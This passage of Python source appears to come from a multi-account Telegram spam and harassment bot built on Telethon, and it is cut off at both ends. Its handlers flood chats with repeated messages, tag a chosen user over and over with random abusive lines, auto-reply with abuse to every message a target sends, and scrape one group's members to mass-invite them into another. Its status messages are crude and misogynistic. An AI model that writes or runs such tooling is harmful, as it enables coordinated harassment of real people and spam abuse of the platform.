pattern=r"\*bigspam"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<div></div><br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗕𝗶𝗴𝗦𝗽𝗮𝗺\n\nCommand:\n\n.bigspam <count> <message to spam>\n\n.bigspam <count> <reply to a message>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message = str(yukki[1])<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> if e.reply_to_msg_id:<br/> await smex.reply(message)<br/> else:<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(0.1)<br/> elif e.reply_to_msg_id and smex.media: <br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "document"):<br/> smex = await e.client.send_file(e.chat_id, smex, caption=smex.text)<br/> await gifspam(e, smex) <br/> await asyncio.sleep(0.1) <br/> elif e.reply_to_msg_id and smex.text:<br/> message = smex.text<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(0.3)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@bdk.on(events.NewMessage(incoming=True, 
pattern=r"\*raid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗥𝗮𝗶𝗱\n\nCommand:\n\n.raid <count> <Username of User>\n\n.raid <count> <reply to a User>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message 
= str(yukki[1])<br/> print(message)<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> c = a.first_name<br/> username = f"[{c}](tg://user?id={g})"<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> reply = random.choice(RAID)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.3)<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> c = b.first_name<br/> counter = int(yukki[0])<br/> username = f"[{c}](tg://user?id={g})"<br/> for _ in range(counter):<br/> reply = random.choice(RAID)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.3)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@shy.on(events.NewMessage(incoming=True, 
pattern=r"\*repo"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = eagle\n\nCommand:\n\n.eagle <count> <Username of User>\n\n.eagle <count> <reply to a User>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message = str(yukki[1])<br/> print(message)<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> c = a.first_name<br/> username = f"[{c}](tg://user?id={g})"<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> reply = random.choice(EAGLE)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.2)<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> c = b.first_name<br/> 
counter = int(yukki[0])<br/> username = f"[{c}](tg://user?id={g})"<br/> for _ in range(counter):<br/> reply = random.choice(EAGLE)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.2)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><div></div><br/>@idk.on(events.NewMessage(incoming=True))<br/>@ydk.on(events.NewMessage(incoming=True))<br/>@wdk.on(events.NewMessage(incoming=True))<br/>@hdk.on(events.NewMessage(incoming=True))<br/>@sdk.on(events.NewMessage(incoming=True))<br/>@adk.on(events.NewMessage(incoming=True))<br/>@bdk.on(events.NewMessage(incoming=True))<br/>@cdk.on(events.NewMessage(incoming=True))<br/>@edk.on(events.NewMessage(incoming=True))<br/>@ddk.on(events.NewMessage(incoming=True))<br/>@vkk.on(events.NewMessage(incoming=True))<br/>@kkk.on(events.NewMessage(incoming=True))<br/>@lkk.on(events.NewMessage(incoming=True))<br/>@mkk.on(events.NewMessage(incoming=True))<br/>@sid.on(events.NewMessage(incoming=True))<br/>@shy.on(events.NewMessage(incoming=True))<br/>@aan.on(events.NewMessage(incoming=True))<br/>@ake.on(events.NewMessage(incoming=True))<br/>@eel.on(events.NewMessage(incoming=True))<br/>@khu.on(events.NewMessage(incoming=True))<br/>@shi.on(events.NewMessage(incoming=True))<br/>@yaa.on(events.NewMessage(incoming=True))<br/>@dav.on(events.NewMessage(incoming=True))<br/>@raj.on(events.NewMessage(incoming=True))<br/>@put.on(events.NewMessage(incoming=True))<br/>@eag.on(events.NewMessage(incoming=True))<br/>@gle.on(events.NewMessage(incoming=True))<br/>@wal.on(events.NewMessage(incoming=True))<br/>@aaa.on(events.NewMessage(incoming=True))<br/>@boy.on(events.NewMessage(incoming=True))<div></div><br/>async def _(event):<br/> global que<br/> queue = que.get(event.sender_id)<br/> if not queue:<br/> return<br/> async with event.client.action(event.chat_id, "typing"):<br/> await asyncio.sleep(0.2)<br/> 
async with event.client.action(event.chat_id, "typing"):<br/> await event.client.send_message(<br/> entity=event.chat_id,<br/> message="""{}""".format(random.choice(RRAID)),<br/> reply_to=event.message.id,<br/> ) <br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@put.on(events.NewMessage(incoming=True, 
pattern=r"\*replyraid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<div></div><div></div>async def _(e):<br/> global que<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗥𝗲𝗽𝗹𝘆𝗥𝗮𝗶𝗱\n\nCommand:\n\n.replyraid <Username of User>\n\n.replyraid <reply to a User>"<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(e.text) > 11:<br/> message = str(yukki[0])<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> que[g] = []<br/> qeue = que.get(g)<br/> appendable = [g]<br/> qeue.append(appendable)<br/> text = "OK SIR WE WILL FUCK THIS BITCH YOU ENJOY THE SHOW..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> que[g] = []<br/> qeue = que.get(g)<br/> appendable = [g]<br/> qeue.append(appendable)<br/> text = "OK SIR WE WILL FUCK THIS BITCH YOU ENJOY THE SHOW..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@adk.on(events.NewMessage(incoming=True, 
pattern=r"\*dreplyraid"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<div></div><br/>async def _(e):<br/> global que<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗗𝗲𝗮𝗰𝘁𝗶𝘃𝗮𝘁𝗲 𝗥𝗲𝗽𝗹𝘆𝗥𝗮𝗶𝗱\n\nCommand:\n\n.dreplyraid <Username of User>\n\n.dreplyraid <reply to a User>"<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", 
"@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(e.text) > 12:<br/> message = str(yukki[0])<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> try:<br/> queue = que.get(g)<br/> queue.pop(0)<br/> except Exception as f:<br/> pass<br/> text = "OK MAN WE WILL STOP NOW KALP GAYA HAI BECHARA..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> try:<br/> queue = que.get(g)<br/> queue.pop(0)<br/> except Exception as f:<br/> pass<br/> text = "OK MAN WE WILL STOP NOW KALP GAYA HAI BECHARA..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <div></div><div></div><div></div><div></div>async def get_chatinfo(event):<br/> chat = event.pattern_match.group(1)<br/> chat_info = None<br/> if chat:<br/> try:<br/> chat = int(chat)<br/> except ValueError:<br/> pass<br/> if not chat:<br/> if event.reply_to_msg_id:<br/> replied_msg = await event.get_reply_message()<br/> if replied_msg.fwd_from and replied_msg.fwd_from.channel_id is not None:<br/> chat = replied_msg.fwd_from.channel_id<br/> else:<br/> chat = event.chat_id<br/> try:<br/> chat_info = await event.client(GetFullChatRequest(chat))<br/> except:<br/> try:<br/> chat_info = await event.client(GetFullChannelRequest(chat))<br/> except ChannelInvalidError:<br/> await event.reply("`Invalid channel/group`")<br/> return None<br/> except ChannelPrivateError:<br/> await event.reply(<br/> "`This is a private channel/group or I am banned from there`"<br/> )<br/> return None<br/> except ChannelPublicGroupNaError:<br/> await event.reply("`Channel or supergroup doesn't exist`")<br/> return None<br/> except (TypeError, ValueError):<br/> await 
event.reply("`Invalid channel/group`")<br/> return None<br/> return chat_info<div></div><br/>def user_full_name(user):<br/> names = [user.first_name, user.last_name]<br/> names = [i for i in list(names) if i]<br/> full_name = " ".join(names)<br/> return full_name<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@gle.on(events.NewMessage(incoming=True, 
pattern=r"\*add"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*add"))<div></div><br/>async def get_users(event):<br/> sender = await event.get_sender()<br/> me = await event.client.get_me()<br/> if not sender.id == me.id:<br/> mafia = await event.edit(f"`processing...`")<br/> else:<br/> h1m4n5hu0p = await get_chatinfo(event)<br/> chat = await event.get_chat()<br/> <br/> if event.is_private:<br/> return await event.edit("`Sorry, Cant add users here`")<br/> s = 0<br/> f = 0<br/> error = "None"<div></div> await event.edit("**TerminalStatus**\n\n`Collecting Users.......`")<br/> async for user in event.client.iter_participants(h1m4n5hu0p.full_chat.id):<br/> try:<br/> if error.startswith("Too"):<br/> return await event.edit(<br/> f"**Terminal Finished With Error**\n(`May Got Limit Error from telethon Please try agin Later`)\n**Error** : \n`{error}`\n\n• Invited `{s}` people \n• Failed to Invite `{f}` people"<br/> )<br/> await event.client(<br/> functions.channels.InviteToChannelRequest(channel=chat, users=[user.id])<br/> )<br/> s = s + 1<br/> await event.edit(<br/> f"**Terminal Running...**\n\n• Invited `{s}` people \n• Failed to Invite `{f}` people\n\n**× LastError:** `{error}`"<br/> )<br/> except Exception as e:<br/> error = str(e)<br/> f = f + 1<br/> return await event.edit(<br/> f"**Terminal Finished** \n\n• Successfully Invited `{s}` people \n• failed to invite `{f}` people"<br/> )<div></div><div></div><div></div><div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@adk.on(events.NewMessage(incoming=True, 
pattern=r"\*ping"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*ping"))<div></div>async def ping(e):<br/> if e.sender_id in SMEX_USERS:<br/> start = datetime.now()<br/> text = "𝐀𝐑𝐊𝐇𝐀𝐌𝐱𝐆𝐎𝐃 𝐒𝐏𝐀𝐌𝐁𝐎𝐓 𝐎𝐏 🥵🔥!"<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> end = datetime.now()<br/> ms = (end-start).microseconds / 1000<br/> await event.edit(f"𝗣𝗢𝗡𝗚!\n`{ms}` ms{ALIVE_NAME} ")<div></div><div></div> <br/> <div></div>@idk.on(events.NewMessage(incoming=True, 
pattern=r"\*restart"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*restart"))<br/>@boy.on(events.NewMessage(incoming=True, 
pattern=r"\*restart"))<br/>async def restart(e):<br/> if e.sender_id in SMEX_USERS:<br/> text = "2𝐌𝐈𝐍 𝐖𝐀𝐈𝐓 𝐏𝐑𝐎 𝐁𝐎𝐓 𝐑𝐄𝐁𝐎𝐎𝐓𝐈𝐍𝐆...\n\nNow Wait Till Piro Bot Is Rebooting..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await idk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ydk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await wdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await hdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await sdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await adk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await bdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await cdk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ddk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await edk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await vkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await kkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await lkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await mkk.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await sid.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await shy.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await aan.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await ake.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await eel.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await khu.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await shi.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await yaa.disconnect()<br/> except Exception as e:<br/> pass<br/> try:<br/> await 